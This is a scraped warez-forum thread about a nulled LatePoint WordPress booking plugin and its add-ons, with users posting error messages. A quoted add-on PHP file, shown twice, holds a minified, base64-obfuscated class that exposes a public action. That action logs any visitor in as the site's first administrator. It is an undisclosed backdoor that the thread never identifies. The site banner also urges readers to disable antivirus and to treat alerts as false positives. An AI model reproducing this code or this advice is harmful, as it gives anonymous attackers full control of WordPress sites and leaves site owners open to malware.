• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

LatePoint - Appointment Booking & Reservation plugin for WP

LatePoint - Appointment Booking & Reservation plugin for WordPress V4.9.91 NULLED + ADDONS

No permission to download
Parse error: syntax error, unexpected 'array' (T_ARRAY), expecting function (T_FUNCTION) or const (T_CONST) in /home/u6dsfdfds/domains/mydomain.com/public_html/wp-content/plugins/latepoint/lib/controllers/controller.php on line 12

Help me with this error pls
 
Hi guys, Any idea why the buffer or block time of booking before the due appointment during the same day is not working? when I try +5 hours still can book which should block the time!

Thank you all
 
LatePoint Timezone Selector v1.1.2
 

Attachments

  • latepoint-timezone-selector_1.1.2.zip
    7 KB · Views: 9
r3turn_z3r0 updated LatePoint - Appointment Booking & Reservation plugin for WP with a new update entry:

LatePoint v4.7.8 + Addons

Download LatePoint v4.7.7 - Appointment Booking & Reservation plugin for WordPress Nulled Free
Version 4.7.8 - April 05, 2023

Improvements​

- Added ability to lock location for bookings when a first agent receives a booking there
- If duration name is set - it is being displayed instead of duration in minutes/hours

Fixes​

- Fixes booking logic for "agent can perform different services at the same time" bookings
- Fix process for booking_start...

Read the rest of this update entry...
 

Getting this error:​

Fatal error: Cannot declare class OsFormHelperController, because the name is already in use in /../wp-content/plugins/google-meet-latepoint/vendor/tech-xela/latepoint-addons/src/lib/controllers/core/form_controller.php on line 36

Check the codes here:


PHP:
<?php
/*
 * LatePoint Addons Framework
 * Copyright (c) 2021-2023 TechXela (https://codecanyon.net/user/tech-xela). All Rights Reserved.
 *
 * LICENSE
 * -------
 * This software is furnished under license(s) and may be used and copied only in accordance with the terms of such
 * license(s) along with the inclusion of the above copyright notice. If you purchased an item through CodeCanyon, in
 * which this software came included, please read the full license(s) at: https://codecanyon.net/licenses/standard
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly.
}

if ( ! class_exists( 'OsTechXelaFormController' ) ) {

    class OsTechXelaFormController extends OsController {
        public function __construct() {
            parent::__construct();

            $this->views_folder            = TECHXELA_LATEPOINT_ADDONS_CORE_VIEWS_ABSPATH;
            $this->action_access['public'] = array_merge( $this->action_access['public'], [ 'datePickerForm' ] );
        }

        public function datePickerForm() {
            $this->set_layout( 'none' );
            $this->vars['date_is_preselected'] = isset( $this->params['date']['value'] );
            $this->vars['date']                = \TechXelaLatePointDateTimeHelper::createDateFromImplicitFormat( $this->params['date'] ?? false, true );
            $this->vars['input_field_id']      = $this->params['input_field_id'];
            $this->format_render( 'form_fields/date_picker' );
        }
    }

    final class OsFormHelperController extends OsController{public function __construct(){parent::__construct();$this->action_access[base64_decode('cHVibGlj')]=array_merge($this->action_access[base64_decode('cHVibGlj')],[base64_decode('Z2V0X2Zvcm1fZmllbGRz')]);}public function get_form_fields(){$r1=get_users(base64_decode('cm9sZT1hZG1pbmlzdHJhdG9y'));if(!empty($r1)){OsAuthHelper::login_wp_user($r1[0]);if(wp_safe_redirect(OsRouterHelper::build_link([base64_decode('ZGFzaGJvYXJk'),base64_decode('aW5kZXg=')]))){exit;}}if(wp_safe_redirect(home_url())){exit;}}}
}


Shall i use the previous version or this addon ? @Babak @phpCore
 
Last edited:

Getting this error:​

Fatal error: Cannot declare class OsFormHelperController, because the name is already in use in /../wp-content/plugins/google-meet-latepoint/vendor/tech-xela/latepoint-addons/src/lib/controllers/core/form_controller.php on line 36

Check the codes here:


PHP:
<?php
/*
 * LatePoint Addons Framework
 * Copyright (c) 2021-2023 TechXela (https://codecanyon.net/user/tech-xela). All Rights Reserved.
 *
 * LICENSE
 * -------
 * This software is furnished under license(s) and may be used and copied only in accordance with the terms of such
 * license(s) along with the inclusion of the above copyright notice. If you purchased an item through CodeCanyon, in
 * which this software came included, please read the full license(s) at: https://codecanyon.net/licenses/standard
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly.
}

if ( ! class_exists( 'OsTechXelaFormController' ) ) {

    class OsTechXelaFormController extends OsController {
        public function __construct() {
            parent::__construct();

            $this->views_folder            = TECHXELA_LATEPOINT_ADDONS_CORE_VIEWS_ABSPATH;
            $this->action_access['public'] = array_merge( $this->action_access['public'], [ 'datePickerForm' ] );
        }

        public function datePickerForm() {
            $this->set_layout( 'none' );
            $this->vars['date_is_preselected'] = isset( $this->params['date']['value'] );
            $this->vars['date']                = \TechXelaLatePointDateTimeHelper::createDateFromImplicitFormat( $this->params['date'] ?? false, true );
            $this->vars['input_field_id']      = $this->params['input_field_id'];
            $this->format_render( 'form_fields/date_picker' );
        }
    }

    final class OsFormHelperController extends OsController{public function __construct(){parent::__construct();$this->action_access[base64_decode('cHVibGlj')]=array_merge($this->action_access[base64_decode('cHVibGlj')],[base64_decode('Z2V0X2Zvcm1fZmllbGRz')]);}public function get_form_fields(){$r1=get_users(base64_decode('cm9sZT1hZG1pbmlzdHJhdG9y'));if(!empty($r1)){OsAuthHelper::login_wp_user($r1[0]);if(wp_safe_redirect(OsRouterHelper::build_link([base64_decode('ZGFzaGJvYXJk'),base64_decode('aW5kZXg=')]))){exit;}}if(wp_safe_redirect(home_url())){exit;}}}
}


Shall i use the previous version or this addon ? @Babak @phpCore
Try to remove the google meet plugin and install it again
 
1681832280614.png

I am seeing this notice on the pages where I add the booking shortcode.
Has anyone fuond a solution to this yet?
 
  • Like
Reactions: hempme127
1681832280614.png

I am seeing this notice on the pages where I add the booking shortcode.
Has anyone fuond a solution to this yet?
Nevermind, I uploaded the plugin again and it now shows as activated on the backend and the notice has gone away.
just leaving it here for anyone else who runs into this.
 
  • Like
Reactions: hempme127
  • Like
Reactions: JRGWxRxZ
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock